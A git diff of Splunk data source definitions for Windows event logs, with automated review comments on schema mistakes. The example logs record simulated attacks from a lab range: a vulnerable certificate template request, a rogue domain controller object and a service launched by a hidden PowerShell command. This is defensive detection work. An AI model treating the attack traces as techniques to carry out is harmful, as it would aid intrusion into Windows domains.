diff --git a/data_sources/windows_event_log_security_4798.yml b/data_sources/windows_event_log_security_4798.yml
new file mode 100644
index 0000000000..d488917f96
--- /dev/null
+++ b/data_sources/windows_event_log_security_4798.yml
@@ -0,0 +1,99 @@
+name: Windows Event Log Security 4798
+id: 29e97f72-eb2e-400e-b0c9-81277547e43b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4798
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- CallerProcessId
+- CallerProcessName
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- session_id
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4798001382400x8020000000000000386860Securityar-win-2.attackrange.localGuestAR-WIN-2AR-WIN-2\GuestAR-WIN-2\AdministratorAdministratorAR-WIN-20x2f4df40x1590C:\Windows\ImmersiveControlPanel\telegram\telegram.exe
diff --git a/data_sources/windows_event_log_security_4876.yml b/data_sources/windows_event_log_security_4876.yml
new file mode 100644
index 0000000000..8c3fc3750b
--- /dev/null
+++ b/data_sources/windows_event_log_security_4876.yml
@@ -0,0 +1,91 @@
+name: Windows Event Log Security 4876
+id: 4a78722a-9cd9-44e8-b010-dffad5c7f170
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4876
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- BackupType
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4876001280500x802000000000000015379961Securitywin-dc-mhaag-attack-range-84.attackrange.local1S-1-5-21-2690122726-1172718210-436210976-500administratorATTACKRANGE0xeb075
diff --git a/data_sources/windows_event_log_security_4886.yml b/data_sources/windows_event_log_security_4886.yml
new file mode 100644
index 0000000000..6ea033bbef
--- /dev/null
+++ b/data_sources/windows_event_log_security_4886.yml
@@ -0,0 +1,82 @@
+name: Windows Event Log Security 4886
+id: c5abd97d-b468-451f-bd65-b4f97efa4ecc
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4886
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Attributes
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- RequestId
+- Requester
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4886001280500x802000000000000015379925Securitywin-dc-mhaag-attack-range-84.attackrange.local7ATTACKRANGE\administrator
diff --git a/data_sources/windows_event_log_security_4887.yml b/data_sources/windows_event_log_security_4887.yml
new file mode 100644
index 0000000000..f01243b726
--- /dev/null
+++ b/data_sources/windows_event_log_security_4887.yml
@@ -0,0 +1,85 @@
+name: Windows Event Log Security 4887
+id: 994c7b19-a623-4231-9818-f00e453b9a75
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4887
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Attributes
+- Channel
+- Computer
+- Disposition
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- RequestId
+- Requester
+- Subject
+- SubjectKeyIdentifier
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4887001280500x80200000000000001830974609Securitycert_authority.attack_range.local7attack_range\attack_userCertificateTemplate:VulnerableTemplate_ESC1
diff --git a/data_sources/windows_event_log_security_5136.yml b/data_sources/windows_event_log_security_5136.yml
new file mode 100644
index 0000000000..4fd9d9ce60
--- /dev/null
+++ b/data_sources/windows_event_log_security_5136.yml
@@ -0,0 +1,105 @@
+name: Windows Event Log Security 5136
+id: 7ba3737e-231e-455d-824e-cd077749f835
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5136
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AppCorrelationID
+- AttributeLDAPDisplayName
+- AttributeSyntaxOID
+- AttributeValue
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DSName
+- DSType
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectClass
+- ObjectDN
+- ObjectGUID
+- OpCorrelationID
+- Opcode
+- OperationType
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 5136001408100x80200000000000001997365Securitywin-dc-mvelazco-02713-392.attackrange.local{73C96723-504B-4F15-830A-F4DDB1C48F2E}-ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x95675attackrange.local%%14676CN=DANNIE_CERVANTES,OU=ServiceAccounts,OU=OGC,OU=Stage,DC=attackrange,DC=local{15AFB68A-679C-4F5B-AC18-4D988B3B3E44}userservicePrincipalName2.5.5.12adm/srv1.attackrange.local%%14674
diff --git a/data_sources/windows_event_log_security_5137.yml b/data_sources/windows_event_log_security_5137.yml
new file mode 100644
index 0000000000..57b73d835c
--- /dev/null
+++ b/data_sources/windows_event_log_security_5137.yml
@@ -0,0 +1,97 @@
+name: Windows Event Log Security 5137
+id: 64ed7bb1-9c3c-4355-ac08-b506ec3b053e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5137
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AppCorrelationID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DSName
+- DSType
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectClass
+- ObjectDN
+- ObjectGUID
+- OpCorrelationID
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 5137001408100x8020000000000000170140Securityar-win-dc.attackrange.local{681cac8c-b5a4-48fd-be93-4339996bd94d}-ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x8561aattackrange.local%%14676CN={2C4C7CD3-7AA5-4E84-89B5-CE9FC75611D4},CN=Policies,CN=System,DC=attackrange,DC=local{3e7ae4de-29a6-41c1-b27c-bf9548b0444c}groupPolicyContainer
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml b/data_sources/windows_event_log_security_5140.yml
similarity index 51%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml
rename to data_sources/windows_event_log_security_5140.yml
index a9ab242fe4..d0b23360d3 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml
+++ b/data_sources/windows_event_log_security_5140.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 5140
+name: Windows Event Log Security 5140
+id: 93e0ca09-e4b8-4da6-872a-d0127c4d2b22
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5140
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- AccessList
@@ -94,4 +106,12 @@ field_mappings:
SubjectUserName: actor.user.name
SubjectLogonId: actor.session.uid
SubjectUserSid: actor.user.uid
-example_log: 5140101280800x8020000000000000138541Securityar-win-66.attackrange.localATTACKRANGE\ELMER_SALASELMER_SALASATTACKRANGE0x2f259bFile10.0.1.1649864\\*\IPC$0x1%%4416
+example_log: 5140101280800x8020000000000000138541Securityar-win-66.attackrange.localATTACKRANGE\ELMER_SALASELMER_SALASATTACKRANGE0x2f259bFile10.0.1.1649864\\*\IPC$0x1%%4416
diff --git a/data_sources/windows_event_log_security_5141.yml b/data_sources/windows_event_log_security_5141.yml
new file mode 100644
index 0000000000..09f144cdb4
--- /dev/null
+++ b/data_sources/windows_event_log_security_5141.yml
@@ -0,0 +1,101 @@
+name: Windows Event Log Security 5141
+id: eafb35fa-f034-4be3-8508-d9173a73c0a1
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5141
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AppCorrelationID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DSName
+- DSType
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Logon_ID
+- Name
+- ObjectClass
+- ObjectDN
+- ObjectGUID
+- OpCorrelationID
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TreeDelete
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 5141001408100x8020000000000000670908Securitywin-dc-range-02713-392.attackrange.local{A3058236-A662-445E-9BEB-DE9210B143AB}-ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x978ac22attackrange.local%%14676CN=NTDS
+ Settings,CN=WIN-HOST-ROGUE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=attackrange,DC=local{48387E55-8777-403F-BC63-2A38289A6BBF}nTDSDSA%%14679
diff --git a/data_sources/windows_event_log_security_5145.yml b/data_sources/windows_event_log_security_5145.yml
new file mode 100644
index 0000000000..39fdae2cff
--- /dev/null
+++ b/data_sources/windows_event_log_security_5145.yml
@@ -0,0 +1,138 @@
+name: Windows Event Log Security 5145
+id: 0746479b-7b82-4d7e-8811-0b35da00f798
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5145
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccessList
+- AccessMask
+- AccessReason
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectType
+- Opcode
+- ProcessID
+- RecordNumber
+- RelativeTargetName
+- ShareLocalPath
+- ShareName
+- Source_Port
+- Source_Workstation
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_domain
+- src_nt_host
+- src_port
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+field_mappings:
+ - data_model: custom_cim
+ data_set: Endpoint.Processes
+ mapping:
+ AccessList: access_list
+ AccessMask: access_mask
+ AccessReason: access_result
+ RelativeTargetName: relative_target_name
+ ObjectType: object_type
+ IpAddress: src_ip
+ IpPort: src_port
+ SubjectDomainName: user_domain
+ SubjectUserName: user
+ SubjectLogonId: user_logon_id
+ SubjectUserSid: user_sid
+ ShareName: share
+ - data_model: ocsf
+ mapping:
+ AccessList: access_list
+ AccessMask: access_mask
+ AccessReason: access_result
+ RelativeTargetName: file.path
+ ObjectType: file.type
+ IpAddress: src_endpoint.ip
+ IpPort: src_endpoint.port
+ SubjectDomainName: actor.user.domain
+ SubjectUserName: actor.user.name
+ SubjectLogonId: actor.session.uid
+ SubjectUserSid: actor.user.uid
+ ShareName: share
+example_log: 5145001281100x80200000000000002018939Securityar-win-dc.attackrange.localANONYMOUS LOGONANONYMOUS
+ LOGONATTACKRANGE0x13ef1bFile10.0.1.1550160\\*\SYSVOL\??\C:\Windows\SYSVOL\sysvollsarpc0x120089%%1538
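Review bot: The `custom_cim` mapping at the end of the hunk declares `data_set: Endpoint.Processes`, but every field it maps (`access_mask`, `access_list`, `share`, `relative_target_name`, `src_ip`, `src_port`) describes a network-share access check, not a process, so this looks like a copy-paste from a process-oriented object. If contentctl or downstream tooling uses `data_set` to decide which dataset a detection's fields belong to, content built on this object would be attached to the wrong model. Unless Endpoint.Processes is really intended, change it to the dataset that actually carries share/access fields; I can't tell from this hunk which one the repo uses for the sibling 5140 object, whose `custom_cim` mapping is cut off above.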
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml b/data_sources/windows_event_log_system_4720.yml
similarity index 77%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml
rename to data_sources/windows_event_log_system_4720.yml
index 2389b1a75d..1464d969e3 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml
+++ b/data_sources/windows_event_log_system_4720.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log System 4720
+name: Windows Event Log System 4720
+id: f01d4758-05c8-4ac4-a9a5-33500dd5eb6c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 4720
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- Account_Domain
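Review bot: The newly added `source: XmlWinEventLog:System` looks wrong for this object: event 4720 (user account created) is, as far as I know, written to the Security channel by Microsoft-Windows-Security-Auditing, not to the System log, so a detection that filters on this source would never match real data. The "System" wording appears inherited from the old `event_name` label, but now that `source` is an explicit field it becomes an actual filter. Suggest `source: XmlWinEventLog:Security` and renaming the file/object to match. The `fields` list continues past the end of the hunk, and the part visible (`Account_Domain`) uses classic WinEventLog-style names rather than the XML rendering's `TargetDomainName`, so it is worth confirming which rendering this object is meant to describe.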
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml b/data_sources/windows_event_log_system_4726.yml
similarity index 74%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml
rename to data_sources/windows_event_log_system_4726.yml
index c98068190f..8e6fcf020f 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml
+++ b/data_sources/windows_event_log_system_4726.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log System 4726
+name: Windows Event Log System 4726
+id: 05e6b2df-b50e-441b-8ac8-565f2e80d62f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 4726
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- Account_Domain
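Review bot: Same issue as the 4720 object: `source: XmlWinEventLog:System` is added here, but 4726 (user account deleted) is, to my knowledge, a Security-channel event, so this source would not match real events. Suggest `source: XmlWinEventLog:Security` and renaming the file/object accordingly. The field list runs past the end of the hunk, so I cannot tell whether the rest of the object is consistent with the `xmlwineventlog` sourcetype declared here.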
diff --git a/data_sources/windows_event_log_system_7036.yml b/data_sources/windows_event_log_system_7036.yml
new file mode 100644
index 0000000000..0dac45adea
--- /dev/null
+++ b/data_sources/windows_event_log_system_7036.yml
@@ -0,0 +1,76 @@
+name: Windows Event Log System 7036
+id: a6e9b34f-1507-4fa1-a4ba-684d1b676a34
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 7036
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- ServiceName
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- param1
+- param2
+- product
+- punct
+- service
+- service_name
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 703604000x8080000000000000168530Systemar-win-dc.attackrange.localsppsvcstopped7300700070007300760063002F0031000000
diff --git a/data_sources/windows_event_log_system_7040.yml b/data_sources/windows_event_log_system_7040.yml
new file mode 100644
index 0000000000..3cdcf9d06b
--- /dev/null
+++ b/data_sources/windows_event_log_system_7040.yml
@@ -0,0 +1,82 @@
+name: Windows Event Log System 7040
+id: 91738e9e-d112-41c9-b91b-e5868d8993d9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 7040
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- ServiceName
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- param1
+- param2
+- param3
+- param4
+- product
+- punct
+- service
+- service_name
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- start_mode
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor
+- vendor_product
+example_log: 704004000x8080000000000000168231Systemar-win-dc.attackrange.localPrint Spoolerdemand startdisabledSpooler
diff --git a/data_sources/windows_event_log_system_7045.yml b/data_sources/windows_event_log_system_7045.yml
new file mode 100644
index 0000000000..d515b774eb
--- /dev/null
+++ b/data_sources/windows_event_log_system_7045.yml
@@ -0,0 +1,82 @@
+name: Windows Event Log System 7045
+id: 614dedc8-8a14-4393-ba9b-6f093cbcd293
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 7045
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccountName
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- ImagePath
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- ServiceName
+- ServiceType
+- StartType
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- service
+- service_name
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- start_mode
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor
+- vendor_product
+example_log: 704504000x8080000000000000168145Systemar-win-dc.attackrange.localKrbSCMpowershell.exe -WindowStyle
+ Hiddenestno'
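Review bot: The `example_log` ends in `Hiddenestno'` — a dangling apostrophe after what looks like a truncated `powershell.exe -WindowStyle Hidden` command line — and none of the values for the declared `ServiceType`, `StartType` or `AccountName` fields are recognisable in the sample. YAML accepts the stray `'` inside a plain scalar, so loading won't fail, but anything that replays this sample to validate the object will not exercise the fields it declares. Suggest regenerating the example from a complete 7045 record and, since it spans lines, writing it as a block scalar (`example_log: |-`) so the line break and quoting are unambiguous.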
diff --git a/data_sources/windows_event_log_taskscheduler_200.yml b/data_sources/windows_event_log_taskscheduler_200.yml
new file mode 100644
index 0000000000..f08316f364
--- /dev/null
+++ b/data_sources/windows_event_log_taskscheduler_200.yml
@@ -0,0 +1,80 @@
+name: Windows Event Log TaskScheduler 200
+id: f8c777f8-e88a-4bba-ae8a-79b250212f23
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log TaskScheduler 200
+source: WinEventLog:Microsoft-Windows-TaskScheduler/Operational
+sourcetype: wineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActionName
+- ActivityID
+- Channel
+- Computer
+- EnginePID
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- TaskInstanceId
+- TaskName
+- ThreadID
+- UserID
+- Version
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor
+- vendor_product
+example_log: 2001420010x80000000000000004323Microsoft-Windows-TaskScheduler/Operationalar-win-dc.attackrange.local\OneLinerTestTask3notepad.exe{2EE32989-FAF3-4BA3-9FB9-DB0080598F68}536
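Review bot: `sourcetype: wineventlog` and `source: WinEventLog:Microsoft-Windows-TaskScheduler/Operational` describe the classic rendering, yet the field list (`EventData_Xml`, `System_Props_Xml`, `EventRecordID`, `SystemTime`, `Guid`) and the `example_log` have the shape produced by the XML rendering, matching the `xmlwineventlog` objects elsewhere in this change. A detection generated from this object would therefore search a sourcetype whose events don't carry these fields. Either switch to `source: XmlWinEventLog:Microsoft-Windows-TaskScheduler/Operational` with `sourcetype: xmlwineventlog`, or replace the field list with the classic-rendering names — whichever matches how the lab actually ingests the Task Scheduler log.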
diff --git a/data_sources/endpoint/Windows_IIS.yml b/data_sources/windows_iis.yml
similarity index 53%
rename from data_sources/endpoint/Windows_IIS.yml
rename to data_sources/windows_iis.yml
index 3e44049c44..75fd6472f6 100644
--- a/data_sources/endpoint/Windows_IIS.yml
+++ b/data_sources/windows_iis.yml
@@ -1,13 +1,13 @@
name: Windows IIS
-id: 6c34ec24-1cba-4847-b035-4363ff04fd47
+id: 469335b3-b6ad-49e2-bbe6-47e15c1464a7
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Windows IIS
source: IIS:Configuration:Operational
sourcetype: IIS:Configuration:Operational
separator: EventID
supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
+- name: Splunk Add-on for Microsoft Windows
url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows IIS 29
- data_source: data_sources/endpoint/event_sources/Windows_IIS_29.yml
+ version: 8.8.0
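Review bot: The `id` of the existing `Windows IIS` object is regenerated (`6c34ec24…` → `469335b3…`) in what is otherwise a schema migration; if any detection, story or external reference keyed on the old UUID, that link silently breaks. Unless the new schema requires fresh ids, keep the original value. The removed `event_names` block was the only visible pointer from this parent object to `Windows IIS 29`, so it is worth confirming that the tooling now discovers the per-event file by name alone.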
